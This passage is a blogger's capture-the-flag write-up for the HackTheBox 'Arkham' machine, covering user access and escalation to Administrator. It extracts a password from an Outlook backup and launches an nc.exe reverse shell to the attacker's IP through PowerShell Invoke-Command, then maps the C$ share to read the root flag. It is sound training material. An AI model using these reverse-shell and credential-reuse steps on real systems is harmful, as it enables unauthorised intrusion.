g0twUHB0FLdRlgk%2B1LfoOx%2BOAGABHbKLruPQnSgSaOr0QO7fs3ABDYpM%2B0brsRYoVq%2FxZrXHXh2iWpRbmrPnC5ZqMgqYmDRqJqBegTWtulqHIbfmX3cwmZtK73nCNfCh4bR8nU8ph%2B9dFQFQm3TB92LYOU%2Bo9ImRGT5ZxHsqO7r9vsYEY9lEOrVQEonBeV1772fxzAWY30P6lQjx7QKzqFpGw7VVu9x6xj4HqyzMw3srhBWpB1evb%2F2cj2VJfV2Ik%2Fe1XeDhxd98FCKdtuwD%2FhfhKKwyMHBLd%2B%2BTRSti5%2BPjgedH8VrYCDw%2Bh7TXbFuuzmic0Ejp%2FMdRQ2lgM7A1Zk2tN7LvOGYXm5vai2%2Fp9KNzcb82%2BWwUxFUNdG%2Fr%2B91Skv9JVChFgo1kBKZ5DSG9GVW0c93lwaDPZR8m2MdKuCGEIGysMjBwS3fvkWX6kL5w8G98g8evxDbfYkHzyF14jnr2kMvA1HZRyD2wcvsnF03HnathuuAfsXFi9nSS%2FwbSz1fz4k0TLI7Jwpbv6aAGFYU9IId4BaMaICpD4zmUdsKF%2FchdWUs7E65By387U2Ejeqn%2FY3UAanW9XVGnW1aWk9nG1iLSIviO15BJYS2423DKh2itxBdEkoL7a2k0YgPMLX%2BTweGj5FUR%2FlCPgQijAFFrHWRvjlEtsVNbr09Qek%2F0QE3yWXS1W%2FgaT%2B7VnbdN2xAhE%2B9N5PSzJudEi8q%2Fo29VPSGioyPZd%2FiNpmNoUDeaeXEVrvY0L%2FaRMkBoThhoybIwKm9JRORG5quVg7mI39K3ANZaw6BBLyJDVbXmOcpydaV%2BJ4ehZuDU5EJNCdYdlqpK5IUgV5VNtTWO9f9YgPaneg14o%2B53eYRjgAQvWxmK%2FVII6JP9zUlbTzD60JeAbleovB8fLJf0D3aUv3mla%2B%2FLyWEXo2NfiqjFqPb9b4NHR199UdBVp6X2nev37%2Ftu0vBXvZz%2Bls4886hDPhV3RdASjsJaoZPrEReF8f43oev%2Bx6ZHIUdkCdk5uThniTrXeAWImx1USbtujkG0xSYdfK%2Fs8Az9gV7hyTmqI0ewkaYsX9uSA%2F9wVoArXnRX%2FrTg7PxMp9hGNKQN%2Fklr%2BXyc%3D

USER.TXT

nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.35] from (UNKNOWN) [10.10.10.130] 49991
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\tomcat\apache-tomcat-8.5.37\bin>whoami
whoami
arkham\alfred
C:\Users\Alfred\Desktop>type user.txt
type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation From Alfred To Administrator

In Alfred's Downloads\backups directory I found a backup.zip file. I transferred it to my local machine with netcat to unzip and analyse it.

C:\Users\Alfred\Downloads\backups>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FA90-3873

 Directory of C:\Users\Alfred\Downloads\backups

02/03/2019  08:41 AM    <DIR>          .
02/03/2019  08:41 AM    <DIR>          ..
02/03/2019  08:41 AM           124,257 backup.zip
               1 File(s)        124,257 bytes
               2 Dir(s)   7,414,816,768 bytes free

UNZIPPING backup.zip

➜  ~ cd htb/arkham
➜  arkham unzip backup.zip 
Archive:  backup.zip
  inflating: alfred@arkham.local.ost  
root@kali:~/Desktop/HTB/boxes/arkham/backups# file alfred@arkham.local.ost 
alfred@arkham.local.ost: Microsoft Outlook email folder
root@kali:~/Desktop/HTB/boxes/arkham/backups# readpst alfred@arkham.local.ost 
Opening PST file and indexes...
Processing Folder "Deleted Items"
Processing Folder "Inbox"
Processing Folder "Outbox"
Processing Folder "Sent Items"
Processing Folder "Calendar"
Processing Folder "Contacts"
Processing Folder "Conversation Action Settings"
Processing Folder "Drafts"
Processing Folder "Journal"
Processing Folder "Junk E-Mail"
Processing Folder "Notes"
Processing Folder "Tasks"
Processing Folder "Sync Issues"
Processing Folder "RSS Feeds"
Processing Folder "Quick Step Settings"
  "alfred@arkham.local.ost" - 15 items done, 0 items skipped.
  "Calendar" - 0 items done, 3 items skipped.
Processing Folder "Conflicts"
Processing Folder "Local Failures"
Processing Folder "Server Failures"
  "Sync Issues" - 3 items done, 0 items skipped.
  "Inbox" - 0 items done, 7 items skipped.
  "Drafts" - 1 items done, 0 items skipped.

In the “Drafts” folder I found a mail with an attached picture.

The attachment is a screenshot of a command prompt showing the password of the user “Batman”.

Using the credentials Batman:Zx^#QZX+T!123, let's see if I can escalate privileges, since user Batman is a member of the Administrators group.

C:\Users>net user batman
net user batman
User name                    Batman
Full Name                    
Comment                      
User's comment               
Country/region code          001 (United States)
Account active               Yes
Account expires              Never

Password last set            2/3/2019 9:25:50 AM
Password expires             Never
Password changeable          2/3/2019 9:25:50 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/28/2019 1:52:48 AM
Logon hours allowed          All
Local Group Memberships      *Administrators       *Remote Management Use
            

So, in the next step I will use PowerShell with the credentials batman:Zx^#QZX+T!123 to get a reverse shell as Batman.

C:\>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\> $username = 'batman'
$username = 'batman'
PS C:\> $password = 'Zx^#QZX+T!123'
$password = 'Zx^#QZX+T!123'
PS C:\> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\> Invoke-command -computername ARKHAM -credential $credential -scriptblock { cmd.exe /c "C:\windows\system32\spool\drivers\color\nc.exe" -e cmd.exe 10.10.14.31 4444 }                                      
Invoke-command -computername ARKHAM -credential $credential -scriptblock { cmd.exe /c "C:\windows\system32\spool\drivers\color\nc.exe" -e cmd.exe 10.10.14.31 4444}

On the other side netcat caught the shell as batman, but the Administrator profile is still inaccessible: the session runs with a UAC-filtered token (whoami /groups would list BUILTIN\Administrators as “Group used for deny only” at Medium Mandatory Level), so membership in Administrators is not enough on its own.

-> htb/arkham nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.35 from (UNKNOWN) [10.10.10.130] 50106
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Batman\Documents>whoami
whoami
arkham\batman
.......
C:\Users>cd Administrator
cd Administrator
Access is denied.

After trying different possibilities, I found that it is possible to map the C$ admin share, which gets around that restriction on this box.

C:\Users>net use Z: \\10.10.10.130\C$
net use Z: \\10.10.10.130\C$
C:\Users>Z:
Z:

Z:\>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is FA90-3873

 Directory of Z:\

02/03/2019  06:30 PM    <DIR>          inetpub
09/15/2018  12:49 PM    <DIR>          PerfLogs
02/03/2019  09:29 AM    <DIR>          Program Files
09/15/2018  02:36 PM    <DIR>          Program Files (x86)
02/01/2019  09:56 AM    <DIR>          tomcat
02/03/2019  06:54 PM    <DIR>          Users
02/03/2019  06:09 PM    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)   7,410,044,928 bytes free

Through the mapped share the Administrator folder is accessible, so I can read root.txt.

C:\Users>type \\10.10.10.130\C$\Users\Administrator\Desktop\root.txt
type \\10.10.10.130\C$\Users\Administrator\Desktop\root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Thanks for reading. 🙂

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
